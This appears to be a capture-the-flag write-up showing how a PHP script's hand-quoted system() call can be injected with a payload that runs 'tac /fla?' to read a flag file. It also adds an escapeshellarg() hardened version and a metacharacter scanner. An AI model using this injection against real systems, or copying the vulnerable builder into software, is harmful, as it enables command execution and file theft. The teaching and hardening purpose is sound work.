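Source code:
<?php
// The lines that read $comm1 and $comm2 are not shown on the page; the payload
// below passes them as the GET parameters comm1 and comm2.
$flag = "#flag in /flag";
// Each parameter is wrapped in double quotes by hand, without escaping.
$comm1 = '"' . $comm1 . '"';
$comm2 = '"' . $comm2 . '"';
$cmd = "file $comm1 $comm2";
system($cmd);
?>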
Payload: ?comm1=index.php";tac /fla?;"&comm2
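$cmd becomes: file "index.php";tac /fla?;"" ""
Here tac /fla? ends up with no quotes around it: the " in the payload closes the quote opened by the script, so the shell runs tac /fla? as a separate command after the ; and expands the ? wildcard.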
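The same command built with the page's manual quoting and with escapeshellarg(), as an added example that is not part of the challenge source. The helper names build_vulnerable, build_hardened and unquoted_metachars are hypothetical, and the scanner is a simplified check that only looks at characters outside quotes.

```php
<?php
// Added example: page's quoting vs. escapeshellarg(), using the page's payload.

function build_vulnerable(string $comm1, string $comm2): string {
    // Same construction as the challenge: quotes added by hand, no escaping.
    return 'file "' . $comm1 . '" "' . $comm2 . '"';
}

function build_hardened(string $comm1, string $comm2): string {
    // escapeshellarg() single-quotes each value and escapes embedded single
    // quotes, so every value reaches file(1) as exactly one argument.
    // "--" keeps a value that starts with "-" from being read as an option.
    $args = array_filter([$comm1, $comm2], fn($a) => $a !== '');
    return 'file -- ' . implode(' ', array_map('escapeshellarg', $args));
}

// Lists shell metacharacters that sit outside any quotes in $cmd.
// Simplification: "$" and "`" inside double quotes are not reported.
function unquoted_metachars(string $cmd): array {
    $found = [];
    $quote = null;                       // active quote char, null when outside
    for ($i = 0, $n = strlen($cmd); $i < $n; $i++) {
        $c = $cmd[$i];
        if ($quote === null) {
            if ($c === '\\') { $i++; continue; }            // escaped char
            if ($c === '"' || $c === "'") { $quote = $c; continue; }
            if (strpos(';|&<>?*`$', $c) !== false) { $found[] = $c; }
        } elseif ($quote === '"' && $c === '\\') {
            $i++;                                           // escape in "..."
        } elseif ($c === $quote) {
            $quote = null;
        }
    }
    return $found;
}

// Values as PHP sees them after URL-decoding the payload from the page.
$comm1 = 'index.php";tac /fla?;"';
$comm2 = '';

foreach (['build_vulnerable', 'build_hardened'] as $builder) {
    $cmd = $builder($comm1, $comm2);
    echo $builder, ': ', $cmd, PHP_EOL;
    echo '  unquoted metacharacters: [', implode(' ', unquoted_metachars($cmd)), ']', PHP_EOL;
}
```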